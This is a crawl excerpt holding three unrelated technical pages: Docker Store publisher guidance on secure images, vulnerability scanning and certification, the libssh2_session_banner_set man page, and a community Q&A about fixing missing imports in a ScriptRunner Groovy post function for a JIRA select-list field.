vulnerability-free Docker images: Choose a secure base image (See your Dockerfile’s FROM: directive) Many base images have a strong record of being secure, including: Debian Linux: both small and tightly-controlled, Debian-linux is a good alternative if you’re currently using Ubuntu. Alpine Linux: Alpine is a minimal linux distribution with an excellent security record. Alpine-based application images: these include python:alpine, ruby:alpine, and golang:alpine. They are secure and minimal, while providing the convenience of their non-Alpine alternatives. Docker strongly recommends Alpine Linux. The founder of this Linux distribution is leading an initiative at Docker to provide safe, compact base images for all container applications. Remove unused components Often, vulnerabilities exist in components that aren’t actually used in the containerized application. To avoid this, you can: Follow best practices when using the apt-getcommand. Run apt-get-removeto destroy any components required to build but not actually run your application. 
Usually, this involves creating multi-line Dockerfile directives, as seen below. The following example shows how to remove curland python-pipafter they are used to install the Python requestspackage, all in a single Dockerfile directive: RUN apt-get update && \ apt-get install -y --no-install-recommends curl python-pip && \ pip install requests && \ apt-get remove -y python-pip curl && \ rm -rf /var/lib/apt/lists/ Files introduced in one directive of your Dockerfile can only be removed in the same directive (and not in subsequent directives in your Dockerfile). Keep required components up-to-date Your images are composed of open-source libraries and packages that amass vulnerabilities over time and are consequently patched. To ensure the integrity of your product, keep your images up-to-date: Periodically update your base image’s version, especially if you’re using a version deemed to be vulnerable. Re-build your image periodically. Directives including commands such as apt-get install ...pull the latest versions of dependencies, which may include security fixes. Create and maintain your publisher profile in the Store Let the Docker community know who you are. Add your details, your company story, and what you do. At the very minimum, we require: - Legal entity name - Company website - Phone number - Valid company email - Company icon/logo (square; at least 512x512px Prepare your image-manifest materials You must provide the namespace (including repository and tags) of a private repository on Docker Cloud or Hub that contains the source for your product. This repository path is not shown to users, but the repositories you choose determine the Product Tiers available for customers to download. The following content information helps us make your product look great and discoverable: - Product Name - Product icon/logo - Short description: a one-to-two-sentence summary; up to 140 characters - Category: Database, Networking, Business Software, etc. and any search tags - Long description: includes product details/pitch - Screenshot(s) - Support link - Product tier name - Product tier description - Product tier price - Installation instructions - Link to license agreements How the manifest information is displayed in the UI This is an approximate representation. We frequently make enhancements to the look and some elements might shift around. Support your users Docker users who download your content from the Store might need your help later, so be prepared for questions! The information you provide with your submission saves support time in the future. Support information If you provide support along with your content, include that information. Is there a support website? What email address can users contact for help? Are there self-help or troubleshooting resources available? Support SLA Include a Service Level Agreement (SLA) for each image you’re offering for the Store. An SLA is your commitment to your users about the nature and level of support you provide to them. Make sure your SLA includes support hours and response-time expectations, where applicable. Security and audit policies Docker Store scans your official images for vulnerabilities with the Docker Security Scanning tool, and audits consumer activity of your images to provide you intelligence about the use of your product. Docker Security Scanning Docker Security Scanning automatically and continuously assesses the intergity of your products. 
The Docker Security Scanning tool deconstructs an image, conducts a binary scan of the bits to identify the open-source components present in each image layer, and associates those components with known vulnerabilities and exposures. Docker then shares the scan results with you as the publisher, so that you can modify the content of your images as necessary. Your scan results are private, and are never shared with end customers or other publishers. Interpret results To interpret the results of a scanned image: Log on to Docker Store. Navigate to the repository details page (for example, Nginx). Click View Available Tags under the pull command in the upper right of the UI. Displalyed is a list of each tag scan with its age. A solid green bar indicates a clean scan without known vulnerabilities. Yellow, orange, and red indicate minor, major, and critical vulnerabilities respectively. Vulnerability scores Vulnerability scores are defined by the entity that issues the vulnerability, such as NVD, and are based on a Qualitative Severity Rating Scale defined as part of the Common Vulnerability Scoring System (CVSS) specification. Click a scan summary to see a list of results for each layer of the image. Each layer may have one or more scannable components represented by colored squares in a grid. Base layers Base layers contain components that are included in the parent image, but that you did not build and may not be able to edit. If a base layer has a vulnerability, switch to a version of the parent image that does not have any vulnerabilities, or to a similar but more secure image. Hover over a square in the grid, then click to see the vulnerability report for that specific component. Only components that add software are scanned. If a layer has no scannable components, it shows a No components in this layermessage. Click the arrow icon (twice) to expand the list and show all vulnerable components and their CVE report codes. Click one of the CVE codes to view the original vulnerability report. Classification of issues All Scan results include the CVE numbers and a CVSS (Common Vulnerability Scoring System) Score. CVE Identifiers (also referred to by the community as “CVE names,” “CVE numbers,” “CVE entries,” “CVE-IDs,” and “CVEs”) are unique identifiers for publicly-known, cyber-security vulnerabilities. The Common Vulnerability Scoring System (CVSS) provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. Its quantitative model ensures repeatable, accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the scores. As a result, CVSS is well-suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability-impact scores. CVSS is commonly used to prioritize vulnerability-remediation activities, and calculate the severity of vulnerabilities discovered on systems. The National Vulnerability Database (NVD) provides CVSS scores for almost all known vulnerabilities. Docker classifies the severity of issues per CVSS range, Docker classification, and service level agreement (SLA) as follows. In addition to CVSS, the Docker Security team can identify or classify vulnerabilities that need to be fixed, and categorize them in the minor-to-critical range. The publisher is presented with initial scan results, including all components with their CVEs and their CVSS scores. 
If you use Docker’s Scanning Service, you can subscribe to a notification service for new vulnerabilities. Failure to meet above SLAs may cause the listing to be put on “hold”. A warning label shows up on the marketplace listing. An email is sent to the users who have downloaded and subscribed for notifications. A Repo’s listing can stay in the “hold” state for a maximum of 1 month, after which the listing is revoked. Usage audit and reporting Unless otherwise negotiated, an audit of activity on publisher content is retained for no less than 180 days. A monthly report of said activity is provided to the publisher with the following data: (1) report of content download by free and paid customers by date and time; (2) report of purchase, cancellations, refunds, tax payments, where applicable, and subscription length for paid customers of the content; and (3) the consolidated amount to be received by the publisher. Certification There are three types of certification that appear in Docker Store. Certifies that a container image on Docker Store has been tested; complies best practices guidelines; runs on a Docker Certified Infrastructure; has proven provenance; been scanned for vulnerabilities; and is supported by Docker and the content publisher This certification is designed for volume, network, and other plugins that access system level Docker APIs. Docker Certified Plugins provide the same level of assurance as a Docker Certified Container, but go further by having passed an additional suite of API compliance testing. Indicates that the release of the Docker Edition and the underlying platform have been tested together and are supported in combination by both Docker and the partner. Docker Certified Publisher FAQ What is the Docker Certified program? Docker Certified Container images and plugins are meant to differentiate high quality content on Docker Store. Customers can consume Certified Containers with confidence knowing that both Docker and the publisher stands behind the solution. Further details can be found in the Docker Partner Program Guide. What are the benefits of Docker Certified? Docker Store promotes Docker Certified Containers and Plugins running on Docker Certified Infrastructure trusted and high quality content. With over 8B image pulls and access to Docker’s large customer base, a publisher can differentiate their content by certifying their images and plugins. With a revenue share agreement, Docker can be a channel for your content. The Docker Certified badge can also be listed alongside external references to your product. How is the Docker Certified Container image listed on Docker Store? These images are differentiated from other images on store through a certification badge. A user can search specifically for CI’s by limiting their search parameters to show only certified content. Is certification optional or required to be listed on Store? Certification is recommended for most commercial and supported container images. Free, community, and other commercial (non-certified) content may also be listed on Docker Store. How is support handled? All Docker Certified Container images and plugins running on Docker Certified Infrastructure come with SLA based support provided by the publisher and Docker. Normally, a customer contacts the publisher for container and application level issues. Likewise, a customer contacts Docker for Docker Edition support. 
In the case where a customer calls Docker (or vice versa) about an issue on the application, Docker advises the customer about the publisher support process and performs a handover directly to the publisher if required. TSAnet is required for exchange of support tickets between the publisher and Docker. How does a publisher apply to the Docker Certified program? Start by applying to be a Docker Technology Partner Requires acceptance of partnership agreement for completion Identify commercial content that can be listed on Store and includes a support offering Test your image against the Docker CS Engine 1.12+ or on a Docker Certified Infrastructure version 17.03 and above (Plugins must run on 17.03 and above) Submit your image for Certification through the publisher portal. Docker scans the image and works with you to address vulnerabilities. Docker also conducts a best practices review of the image. Be a TSAnet member or join the Docker Limited Group. Upon completion of Certification criteria, and acceptance by Docker, the Publisher’s product page is updated to reflect Certified status. Is there a fee to join the program? In the future, Docker may charge a small annual listing fee. This is waived for the initial period. What is the difference between Official Images and Docker Certified? Many Official images transition to the Docker Certified program and are maintained and updated by the original owner of the software. Docker continues to maintain some of the base OS images and language frameworks. How is certification of plugins handled? Docker Certification program recognizes the need to apply special scrutiny and testing to containers that access system level interfaces like storage volumes and networking. Docker identifies these special containers as “Plugins” which require additional testing by the publisher or Docker. These plugins employ the V2 Plugin Architecture that was first made available in 1.12 (experimental) and now available in Docker Enterprise Edition 17.03Docker, docker, store, purchase images
https://docs.docker.com/docker-store/publish/
CC-MAIN-2018-34
en
refinedweb
libssh2_session_banner_set man page

libssh2_session_banner_set — set the SSH protocol banner for the local client

Synopsis
#include <libssh2.h>
int libssh2_session_banner_set(LIBSSH2_SESSION *session, const char *banner);

Description
session - Session instance as returned by libssh2_session_init_ex(3)
banner - A pointer to a zero-terminated string holding the user-defined banner

Set the banner that will be sent to the remote host when the SSH session is started with libssh2_session_handshake(3). This is optional; a banner corresponding to the protocol and libssh2 version will be sent by default.

Return Value
Returns 0 on success or negative on failure. It returns LIBSSH2_ERROR_EAGAIN when it would otherwise block. While LIBSSH2_ERROR_EAGAIN is a negative number, it isn't really a failure per se.

Errors
LIBSSH2_ERROR_ALLOC - An internal memory allocation call failed.

Availability
Added in 1.4.0. Before 1.4.0 this function was known as libssh2_banner_set(3).

See Also
libssh2_session_handshake(3), libssh2_session_banner_get(3)

Referenced By
libssh2_banner_set(3), libssh2_session_banner_get(3).
https://www.mankier.com/3/libssh2_session_banner_set
CC-MAIN-2018-34
en
refinedweb
I can't seem to find any good documentation on Script Runner or any examples for doing this online. The one link I found that seemed promising doesn't work, and I can't find documentation to figure out what's wrong. Does anyone have any examples of updating a select list custom field in a post function on a transition? Also, is there a good resource for Script Runner out there? Script Runner seems very powerful, but it's sorely lacking in documentation. I love jira-python and am really productive with it, even though I don't know Python, just because the documentation is so good. It seems like you really could do anything with Script Runner if it had decent docs/examples. Here's what I have...

/* IF issue has the 'Assigned QA' field populated, set 'QA % Complete' value to 100 when issue is closed */
import com.atlassian.jira.component.ComponentAccessor
import com.atlassian.jira.issue.MutableIssue
import com.atlassian.jira.ComponentManager;
import com.atlassian.jira.issue.fields.CustomField;
import com.atlassian.jira.issue.CustomFieldManager;

MutableIssue issue = issue
def customFieldManager = ComponentAccessor.getCustomFieldManager()
def qaResourceCf = customFieldManager.getCustomFieldObjectByName("Assigned QA")
def qaResource = issue.getCustomFieldValue(qaResourceCf)
def CustomFieldManager cFM_QAPercent = ComponentManager.getInstance().getCustomFieldManager()
def CustomField qaPercent = cFM_QAPercent.getCustomFieldObjectByName("QA % Complete")
def Options options = WebAppsCf.getOptions(null, qaPercent.getRelevantConfig(issue), null);
def Option newOption = options.getOptionById(10840);
ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption );
if (qaResource) {
    customField.updateValue(null, issue, mVal, new DefaultIssueChangeHolder());
}

Here are the errors I get:

Caused by: org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:
Script1.groovy: 16: unable to resolve class Options
 @ line 16, column 13.
   def Options options = WebAppsCf.getOptions(null, qaPercent.getRelevantConfig(issue), null);
   ^
 @ line 17, column 12.
   def Option newOption = options.getOptionById(10840);
   ^
Script1.groovy: 19: unable to resolve class ModifiedValue
 @ line 19, column 15.
   ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption );
   ^
Script1.groovy: 19: unable to resolve class ModifiedValue
 @ line 19, column 22.
   ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption );
   ^
Script1.groovy: 22: unable to resolve class DefaultIssueChangeHolder
 @ line 22, column 48.
   customField.updateValue(null, issue, mVal, new Defaul
   ^
5 errors
at org.codehaus.groovy.control.ErrorCollector.failIfErrors(ErrorCollector.java:302)
at org.codehaus.groovy.control.CompilationUnit.applyToSourceUnits(CompilationUnit.java:858)
at org.codehaus.groovy.control.CompilationUnit.doPhaseOperation(CompilationUnit.java:548)
at org.codehaus.groovy.control.CompilationUnit.compile(CompilationUnit.java:497)
at groovy.lang.GroovyClassLoader.doParseClass(GroovyClassLoader.java:306)
at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:287)
at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:267)
at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:214)
at org.codehaus.groovy.jsr223.GroovyScriptEngineImpl.getScriptClass(GroovyScriptEngineImpl.java:337)
at org.codehaus.groovy.jsr223.GroovyScriptEngineImpl.eval(GroovyScriptEngineImpl.java:109)
... 186 more

You're trying to use ModifiedValue but you haven't imported it! import com.atlassian.jira.issue.ModifiedValue.
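For reference, here is one way the script could look once the missing classes are imported. This is a minimal sketch only: it assumes the field names "Assigned QA" and "QA % Complete" and the option id 10840 from the question, uses ComponentAccessor and the OptionsManager instead of the older ComponentManager, and relies on the issue variable that ScriptRunner binds in a workflow post function. Exact APIs can vary between JIRA versions, so treat it as a starting point rather than a drop-in solution.

import com.atlassian.jira.component.ComponentAccessor
import com.atlassian.jira.issue.ModifiedValue
import com.atlassian.jira.issue.util.DefaultIssueChangeHolder

// 'issue' is bound by ScriptRunner in a workflow post function
def customFieldManager = ComponentAccessor.getCustomFieldManager()
def optionsManager = ComponentAccessor.getOptionsManager()

// Field names taken from the question; adjust them to match your instance
def qaResourceCf = customFieldManager.getCustomFieldObjectByName("Assigned QA")
def qaPercentCf = customFieldManager.getCustomFieldObjectByName("QA % Complete")

def qaResource = issue.getCustomFieldValue(qaResourceCf)

if (qaResource) {
    // Resolve the select-list option; 10840 is the option id used in the question
    def fieldConfig = qaPercentCf.getRelevantConfig(issue)
    def newOption = optionsManager.getOptions(fieldConfig).getOptionById(10840L)

    // Update the field value and record the change against the issue
    def oldValue = issue.getCustomFieldValue(qaPercentCf)
    qaPercentCf.updateValue(null, issue, new ModifiedValue(oldValue, newOption), new DefaultIssueChangeHolder())
}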
https://community.atlassian.com/t5/Jira-questions/Script-runner-how-to-update-custom-field-that-s-a-select-list/qaq-p/203693
CC-MAIN-2018-34
en
refinedweb